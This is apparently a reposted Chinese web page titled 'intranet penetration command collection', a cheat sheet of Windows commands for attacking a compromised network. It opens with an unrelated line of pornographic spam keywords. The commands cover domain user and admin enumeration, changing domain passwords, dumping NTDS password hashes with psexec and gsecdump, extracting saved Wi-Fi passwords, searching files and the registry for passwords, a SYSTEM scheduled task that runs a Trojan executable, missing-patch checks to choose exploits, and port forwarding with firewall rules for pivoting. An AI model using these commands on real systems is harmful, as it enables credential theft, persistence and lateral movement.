小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

內(nèi)網(wǎng)滲透命令大全

 鶯英歌舞 2017-06-28



1.域常用操作命令:

net group /domain                       //獲得所有域用戶組列表

net group qq_group /domain              //顯示域中qq_group組的成員

net group qq_group /del /domain         //刪除域中qq_group

net group qq_group qq /del /domain      //刪除域內(nèi)qq_group 群組中的成員QQ

net group qq_group /add /domain         //增加域中的群組

net group 'domain admins' /domain       //獲得域管理員列表

net group 'enterprise admins' /domain    //獲得企業(yè)管理員列表

net localgroup administrators /domain   //獲取域內(nèi)置administrators組用(enterprise admins、domain admins

net group 'domain controllers' /domain   //獲得域控制器列表

net group 'domain computers' /domain    //獲得所有域成員計(jì)算機(jī)列表

net user /domain                       //獲得所有域用戶列表

net user someuser /domain              //獲得指定賬戶someuser的詳細(xì)信息

net accounts /domain               //獲得域密碼策略設(shè)置,密碼長短,錯誤鎖定等信息

nei view /domain                  //查詢有幾個域, 查詢域列表

net view /domain:testdomain       //查看 testdomain域中的計(jì)算機(jī)列表

nltest /domain_trusts             //獲取域信任信息

net user domain-admin /domain     //查看管理員登陸時間,密碼過期時間,是否有登陸腳本,組分配等信息

net config Workstation         //查詢機(jī)器屬于哪個域

net time /domian               //查詢主域服務(wù)器的時間

echo %logonserver%              //查看登陸到這臺服務(wù)器的計(jì)算機(jī)名

net time  \\192.168.1.1         //查詢遠(yuǎn)程共享主機(jī)192.168.1.1的時間

net use \\IP\ipc$ password /user:username@domain     //ipc$域內(nèi)連接

net  view  \\dc2.backlion.com         //查看域控共享情況

dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt  //列出sysvol日志記錄

xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt  /i  /e  /c//遠(yuǎn)程拷貝到本地sysvol日志

net user  /domain  bk bk123                 //修改域內(nèi)用戶密碼,需要管理員權(quán)限

net  localgroup  administartors   SEZKL\backlion  /add     //SEZKL域中的用戶backlion添加到administrators組中

mstsc /admin                 //遠(yuǎn)程桌面登錄到console會話解決hash無法抓出問題

gpupdate/force                  //更新域策略

psexec  \\192.168.1.3  -u administrator  -p  bk1234 -c  gsecdump.exe  -u

  //從域服務(wù)器密碼存儲文件windows/ntds/ntds.dit導(dǎo)出hash值出來

gsecdump  -a        //獲取域登管理員登錄過得hash值,這里gescdump為第三方導(dǎo)出AD域的hash

tasklist /S ip /U domain\username /P /V    //查看遠(yuǎn)程計(jì)算機(jī)進(jìn)程列


2.基本內(nèi)網(wǎng)滲透命令:

ipconfig/all    //查看IP地址

ipconfig /release  //釋放地址

ipconfig /renew 重新獲取Ip地址

whoami    //查詢賬號所屬權(quán)限

whoami/all  //查看sid

systeminfo  //查詢系統(tǒng)以及補(bǔ)丁信息

tasklist /svc   //查看進(jìn)程

taskkill /im 進(jìn)程名稱(cmd) //結(jié)束進(jìn)程

taskkill /pid[進(jìn)程碼] -t(結(jié)束該進(jìn)程) -f(強(qiáng)制結(jié)束該進(jìn)程以及所有子進(jìn)程)

wmic qfe  get hotfixid    //查看已安裝過得補(bǔ)丁,這個很實(shí)用

wmic qfe list full /format:htable > hotfixes.htm  //詳細(xì)的補(bǔ)丁安裝

wmic  qfe      //查詢補(bǔ)丁信息以及微軟提供的下載地址

ping hostname(主機(jī)名)   //顯示該機(jī)器名的IP

net start   //查看當(dāng)前運(yùn)行的服務(wù)

net user      //查看本地組的用戶

net localhroup administrators   //查看本機(jī)管理員組有哪些用戶

net use      //查看會話

net session     //查看當(dāng)前會話

net share       //查看SMB指向的路徑[即共享]

wmic share get name,path   //查看SMB指向的路徑

wmic nteventlog get path,filename,writeable //查詢系統(tǒng)日志文件存儲位置

net use \\IP\ipc$  password  /user:username      //建立IPC會話(工作組模式)

net use  z:  \\192.168.1.1      //建立映射到本機(jī)Z

net time \\172.16.16.2        //查詢共享主機(jī)的是

at \\172.16.16.2 13:50 c:\windows\2009.exe      //在共享主機(jī)上執(zhí)行

netstat  -ano      //查看開放的端口

netstat -an | find “3389”   //找到3389端口

net accounts      //查看本地密碼策略

nbtstat –A ip      //netbiso查詢

net view      //查看機(jī)器注釋或許能得到當(dāng)前活動狀態(tài)的機(jī)器列表,如果禁用netbios就查看不出來

echo %PROCESSOR_ARCHITECTURE%        //查看系統(tǒng)是32還是64  

set                              //查看系統(tǒng)環(huán)境設(shè)置變量

net start                     //查看當(dāng)前運(yùn)行的服務(wù)

wmic service list brief             //查看進(jìn)程服務(wù)

wmic process list brief         //查看進(jìn)程

wmic startup list brief       //查看啟動程序信息

wmic product list brief           //查看安裝程序和版本信息(漏洞利用線索)

wmic startup list full         //識別開機(jī)啟動的程序

wmic process where(description='mysqld.exe') >>mysql.log  //獲取軟件安裝路徑


for /f 'skip=9 tokens=1,2 delims=:' %i in ('netsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear

//一鍵獲取wifi密碼


if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)

//查看是否支持posershell


qwinsta                       //查看登錄情況


schtasks.exe  /Create /RU'SYSTEM' /SC MINUTE /MO 45 /TN FIREWALL /TR 'c:/muma.ex    e' /ED 2017/4/7  //添加計(jì)劃任務(wù)



set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i '%i'||@echo %%i% Not Installed!)&del /f/q /a a.txt

//windows未打補(bǔ)丁情況


REG query HKCU  /v 'pwd' /s  //獲取保存到注冊表中的密碼


3.內(nèi)網(wǎng)網(wǎng)絡(luò)結(jié)常用命令:

tracert IP    //路由跟蹤

route print    //打印路由表

arp -a          //列出本網(wǎng)段內(nèi)所有活躍的IP地址

arp -s ip + mac//綁定macip地址

arp -d ip + mac //解綁macip地址

nbtscan -r 192.168.16.0/24      //通過小工具nbtscan掃描整個網(wǎng)絡(luò)

netsh firewall show config     //查看防火墻策略

netsh firewall show state     //查看防火墻策略

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i'ttl'   //批量掃描內(nèi)網(wǎng)存活主機(jī)


windows自帶端口轉(zhuǎn)發(fā):

netsh interface ipv6 install  //首先安裝IPV6xp、2003IPV6必須安裝,否則端口轉(zhuǎn)發(fā)不可用!)

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22  //將本機(jī)221.1.1.122

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22

netsh interface portproxy show all // 查看轉(zhuǎn)發(fā)配置

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22 //刪除配置

netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all  //添加防火墻規(guī)則,允許連接22


4.敏感數(shù)據(jù)和目錄:

dir /b/s config.*              //查看所在目錄所有config.為前綴的文件

findstr /si password *.xml *.ini *.txt    //查看后綴名文件中含有password關(guān)鍵字的文件

findstr /si login *.xml *.ini *.txt    //查看后綴名文件中含有login關(guān)鍵字的文件

copy con 創(chuàng)建命令:

copy con  ftp.bat     //創(chuàng)建ftp.bat批處理,然后輸入ifconfig等命令,按ctr+z退出,并創(chuàng)建成功

copy con  test.vbs    //創(chuàng)建test.vbs腳本,輸入腳本后,按ctr+z退出,并創(chuàng)建成功


5.dsqueryAD查詢工具:

dsquery user domainroot -limit 65535 && net user /domain    //列出該域內(nèi)所有用戶名

dsquery server -domain super.com | dsget server -dnsname -site    //搜索域內(nèi)所有域控制器并顯示他們的DNS主機(jī)名和站點(diǎn)名稱

dsquery contact    //尋找目錄中的聯(lián)系人

dsquery subnet     //列出該域內(nèi)網(wǎng)段劃分

query user             //查詢那些用戶在線

dsquery group && net group /domain     //列出該域內(nèi)分組

dsquery ou                             //列出該域內(nèi)組織單位

dsquery server && net time /domain      //列出該域內(nèi)域控制器

dsquery site -o rdn                 //搜索域中所有站點(diǎn)的名稱

dsquery group dc=super,dc=com |more   //搜索在DC=SUPER,DC=COM 域中的所有組

psloggedon.exe                        //查詢那臺主機(jī)和用戶登錄到該主機(jī)上

netsess.exe   //192.168.1.115         //遠(yuǎn)程主機(jī)上無需管理員權(quán)限,查詢到主機(jī)名和用戶

reg query 'HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT' //獲取最近mstsc登錄的記錄


6.DOS常用快捷命令

mspaint  畫圖工具

calc  計(jì)算器

notepad  記事本

taskmgr  任務(wù)管理器

osk  打開屏幕鍵盤

gpedit.msc  組策略

services.msc  本地服務(wù)

compmgmt.msc  計(jì)算機(jī)管理

devmgmt.msc  設(shè)備管理器

winver  查看系統(tǒng)版本

magnify  放大鏡實(shí)用程序

eventvwr  事件查看器

Regedit  打開注冊表

resmon  資源監(jiān)視器

WMIC BIOS get releasedate  查看電腦生產(chǎn)日期

mstsc -f  遠(yuǎn)程連接(可以全屏)


附件下載:


    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多